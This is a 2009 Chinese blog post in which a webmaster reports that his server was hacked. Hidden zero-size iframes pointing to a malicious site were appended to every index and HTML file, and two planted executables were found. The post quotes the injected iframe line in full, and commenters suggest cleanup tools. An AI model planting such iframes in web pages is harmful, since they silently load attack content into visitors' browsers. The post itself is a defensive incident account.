服务器再次被攻击

Category : 站务 | Post on 2009/08/04 18:26 by Richard | Comments:2
存放另外一个站点的服务器(w206)也被攻击了,时间是今天凌晨5:06。

服务器上所有目录下面的index.php、*.htm、*.html均在文件末被植入这样一句代码:

<iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


文件长度增加145字节。

检查reycross.net这个站点,IP地址是91.212.198.116,托管在LIR.KZ的机房,位于俄罗斯,而域名是在美国注册。

这个站点已经被报告为攻击网站,存在高度危险。

所以,访问internet网站,需要高度警惕,包括熟悉的网站也是一样。安装防杀病毒、防杀木马的软件是非常必要的。

只是,只是,面对是上千个目录的文件,我还需要逐个去清除。。。。。我晕。。。。

晚上,终于清理完成。发现隐藏在zb\skin\zero_vote\下面有两个执行文件proposta.exe和proposta.ppt.scr,都是43k的大小,FTP上去都删不掉,估计是文件在Windows服务器运行中。于是我找了机房值班人员将它们彻底删除。

删完以后才后悔,没有留一份样本分析。。。。恨。。。。

最新日志 随机日志 综合排行
  • 拍公仔的理查
  • Beats Flex蓝牙运动耳机
  • TTartisan 90 f/1.2...
  • 香港音响展2021设备欣赏——McI...
  • 香港音响展2021设备欣赏——Sol...
  • SONY A1试用感受
  • 东京奥运进行时
  • 荷赛获奖者都用的什么相机?
  • 7月1日,晴
  • 拜登就职
  • 在钢筋水泥的森林中
  • 网上淘了个东西。。。
  • 手机应用商店的凤凰涅槃
  • 元宵
  • F&E 2009花絮片(鼻血...
  • 中秋
  • 黑白映画——雨丹
  • 一声叹息,港媒关于菲律宾游客被劫持事...
  • 手机也博客
  • 健康早餐 之 火腿三明治
  • Nokia E61固件升级教程
  • Nokia E61拆解及更换摇杆完全...
  • 月陀岛•传说中的马尔代夫
  • 简约风范·Nokia E60试用报告
  • 住家美食--微波炉烤红薯
  • 手机应用商店的凤凰涅槃
  • 商务无敌·Nokia E61试用手记
  • 贺年短信
  • 天若有情
  • 师姐的博易·博客价值评估

  • 最后编辑: Richard 编辑于2009/08/04 23:49
    Tags: , ,
    DEMO
    2009/08/07 14:05
    用Safe3IF能有效防止攻击。网上都有免费的。我以前的程序老被攻击。下载了这个稍微缓和了。这个能记录攻击者的真实IP地址。
    Richard 回复于 2009/08/07 19:34
    谢谢,您是哪位站长啊?
    DEMO
    2009/08/07 14:19
    其实我觉得,你犯不着一个一个文件去清除的。网上有一个软件的。这里上传不上去文件。这个软件,支持在那个文件包下面找什么内容。找完后,直接替换成空的就OK了。
    Richard 回复于 2009/08/07 19:33
    后来我写了一个程序。。。
    分页: 1/1 第一页 1 最后页
    发表评论
    表情
    emotemotemotemotemot
    emotemotemotemotemot
    emotemotemotemotemot
    emotemotemotemotemot
    打开HTML
    打开UBB
    打开表情
    隐藏
    昵称   密码   游客无需密码
    网址   电邮   [注册]